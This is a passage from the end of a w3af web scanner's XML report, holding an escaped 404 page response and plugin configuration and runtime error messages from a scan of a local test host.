                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/post&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://192.168.0.116:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: POST | http://domain:31337/post | URL encoded form: (pseudo,message)&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://192.168.0.116:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://192.168.0.116:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3afrun>
"""
